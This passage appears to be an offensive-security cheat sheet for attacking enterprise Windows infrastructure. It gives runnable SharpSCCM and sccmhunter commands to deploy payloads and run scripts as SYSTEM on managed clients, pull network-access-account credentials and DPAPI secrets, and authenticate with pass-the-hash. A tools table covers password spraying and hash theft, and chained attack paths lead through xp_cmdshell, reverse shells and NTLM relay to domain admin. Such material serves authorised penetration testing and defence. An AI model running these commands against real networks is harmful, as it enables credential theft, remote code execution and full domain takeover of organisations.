.\SharpSCCM.exe new collection-member -d TARGET_HOST -n "COLLECTION" -t device -sms SMS_IP

# 4. Deploy the application
.\SharpSCCM.exe new deployment -a APP_NAME -c "COLLECTION" -sms SMS_IP

# 5. Force policy update (optional, speeds up deployment)
.\SharpSCCM.exe invoke update -n "COLLECTION" -sms SMS_IP

Script Deployment (sccmhunter)

# Prepare the script payload
echo 'whoami;hostname' > cmd.txt

# Launch admin shell with a second admin account for script approval
python3 sccmhunter.py admin -u USER -p PASS -ip SMS_IP \
  -au 'PWNED$' -ap ComputerPass123

# Inside the admin shell:
interact RESOURCE_ID
script /path/to/cmd.txt
# Output: nt authority\system

Tip: SCCM requires a different admin account to approve scripts than the one that created them. Use add_admin PWNED$ SID in sccmhunter to promote a computer account as the second admin.


sccmhunter Quick Reference

# Discovery
sccmhunter.py find -u USER -p PASS -d DOMAIN -dc-ip DC_IP
sccmhunter.py show -all

# SMB enumeration
sccmhunter.py smb -u USER -p PASS -d DOMAIN -dc-ip DC_IP -save

# HTTP policy extraction (NAA credentials)
sccmhunter.py http -u USER -p PASS -dc-ip DC_IP -cn 'COMPUTER$' -cp PASS

# DPAPI secrets
sccmhunter.py dpapi -u USER -p PASS -d DOMAIN -dc-ip DC_IP -target TARGET -wmi

# Admin shell
sccmhunter.py admin -u USER -p PASS -ip SMS_IP
sccmhunter.py admin -u USER -p HASH -ip SMS_IP  # pass-the-hash

Tools Reference

Tool                 | Purpose                                               | Platform
---------------------|-------------------------------------------------------|---------
impacket-mssqlclient | MSSQL shell, enumeration, privesc, linked servers     | Linux
PowerUpSQL           | Automated MSSQL audit, enumeration, exploitation      | Windows
MailSniper           | Exchange GAL dump, password spraying                  | Windows
Ruler                | Exchange autodiscover, brute force                    | Linux
ntlmscan             | Exchange NTLM endpoint enumeration                    | Linux
ntlm_theft           | Generate 21 types of hash theft documents             | Linux
PXEThief             | PXE boot media credential extraction                  | Windows
sccmhunter           | SCCM enumeration, admin, DPAPI, HTTP policy           | Linux
SharpSCCM            | SCCM enumeration, app deploy, client push abuse       | Windows
Inveigh              | NTLM hash capture (SMB/HTTP)                          | Windows

Attack Chains

MSSQL to Domain Admin

SQL creds -> impersonate sa -> xp_cmdshell -> reverse shell
  -> SeImpersonatePrivilege -> SYSTEM -> domain creds (secretsdump)

MSSQL Linked Server Chain

SQL01 (low-priv) -> exec_as_login sa -> use_link SQL02
  -> xp_cmdshell on SQL02 -> pivot to new network segment

Exchange to Domain Compromise

OWA password spray -> valid creds -> phishing (NTLM hash theft)
  -> relay or crack hash -> lateral movement -> domain admin

SCCM PXE to Domain Admin

PXE boot interception -> crack media password -> NAA creds
  -> domain access -> SCCM admin escalation -> SYSTEM on any client

SCCM Takeover via NTLM Relay

Coerce SCCM server auth -> relay to MSSQL site DB -> INSERT admin
  -> deploy scripts -> SYSTEM on any managed client

SCCM Client Push to Domain

SharpSCCM client-push -> capture push account NTLM hash
  -> relay to DC or other targets -> domain compromise